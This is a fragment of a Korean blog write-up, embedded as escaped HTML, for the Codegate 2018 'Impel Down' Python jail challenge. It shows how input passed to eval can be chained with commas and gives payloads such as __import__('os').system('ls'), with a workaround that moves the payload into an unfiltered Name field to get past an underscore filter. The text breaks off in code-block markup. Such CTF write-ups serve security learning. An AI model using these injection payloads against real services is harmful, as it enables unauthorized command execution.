      <description>&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;[Codegate 2018] Misc – Impel Down&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 300px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99238D415C67730807&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99238D415C67730807&quot; width=&quot;300&quot; height=&quot;113&quot; filename=&quot;1.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;문제의 description은 별다른 내용이 없고 nc 호스트와 포트만 존재합니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 676px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99D1DE405C67731A07&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99D1DE405C67731A07&quot; width=&quot;676&quot; height=&quot;310&quot; filename=&quot;2.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;서버에 접속해보면 python이 돌아가고 있으며, 전형적인 python jailbreak 문제인 것으로 예상해 볼 수 있습니다. 해당 스크립트는 약 10초가 지나면 timeout 되어 접속이 종료되며, 해당 시간 내에 flag를 획득해야 하는 형태입니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 459px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9929CB385C67732C0A&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9929CB385C67732C0A&quot; width=&quot;459&quot; height=&quot;581&quot; filename=&quot;3.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;Name에 임의의 문자를 넣은 후 4가지 메뉴 중 하나를 선택하여 입력하면 해당 기능이 수행되며, “dig a”와 같이 untrusted input을 전달하게 되면 에러가 발생하게 됩니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;에러 내용을 살펴보면 해당 work 변수에 우리가 입력한 명령이 들어가게 되며, 결과적으로 eval 함수를 이용해 “your.[명령]()”와 같은 형태로 명령이 실행됩니다. your은 클래스의 인스턴스라고 예상해 볼 수 있고, dig와 같은 명령들은 이에 속하는 함수들이라고 볼 수 있겠죠. 이 때 eval 함수를 사용하기 때문에 우리가 원하는 명령을 실행시킬 수 있는 가능성이 생겼습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;파이썬의 eval 함수에서는 ,(comma)를 이용하여 복수의 명령을 실행할 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 551px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99072D345C67733E04&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99072D345C67733E04&quot; width=&quot;551&quot; height=&quot;221&quot; filename=&quot;4.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;이런식으로 말이죠.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;이 특성을 이용해 work 변수에 아래와 같은 명령을 삽입할 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;dig(), [임의 명령], your.dig&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;이와 같이 입력하게 되면 eval에 들어가는 명령은 “your.dig(), [임의 명령], your.dig()”가 될 것이며 이로 인해 dig 함수는 총 2번 실행되고, 그 사이에 우리가 원하는 명령을 수행할 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;dig,__import__(‘os’).system(‘ls’),your.dig&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;따라서 위와 같은 명령을 통해 쉘 명령을 내릴 수 있지만, 해당 스크립트에서는 _(underbar)가 들어갈 경우 필터링 후 종료시켜버리기 때문에 다른 방법을 찾아야 했습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;여기서 생각할 수 있는 것은 _를 사용하지 않고 os모듈을 import 하거나, 다른 변수에 값을 할당해 이를 eval로 실행하는 것이 될 것입니다. 1번 방법은 대회 중 떠오르지 않아 실패했지만 2번의 경우 스크립트 시작 당시 Name에 변수를 받지만 별다른 필터링이 적용되어있지 않아 이를 이용할 수 있겠다고 생각하였습니다. 따라서 Name에 __import__(‘os’).system(‘ls’)와 같은 쉘 명령을 실행시킬 수 있는 명령어를 입력 후 work에서 eval을 이용해 이를 실행시키는 형태로 진행하였습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 685px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/994F64405C67734D0A&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F994F64405C67734D0A&quot; width=&quot;685&quot; height=&quot;614&quot; filename=&quot;5.png&quot; filemime=&quot;image/jpeg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;해당 writeup은 대회 종료 후 추출한 소스코드를 이용해 로컬에서 돌리고 있는 상황이라 로컬의 ls 결과가 출력되었습니다. 아무튼 이와 같은 형태로 쉘 명령을 실행시킬 수 있으며,&amp;nbsp;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;“cat Impel_Down.py”&lt;/strong&gt;&amp;nbsp;등의 명령을 통해 소스코드를 추출할 수 있습니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c67721bbf3b5004813667&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;10&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;11&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;12&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;13&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;14&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;15&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;16&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;17&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;18&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;19&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;20&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;21&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-22&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;22&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-23&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;23&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-24&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;24&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-25&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;25&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-26&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;26&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-27&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;27&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-28&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px 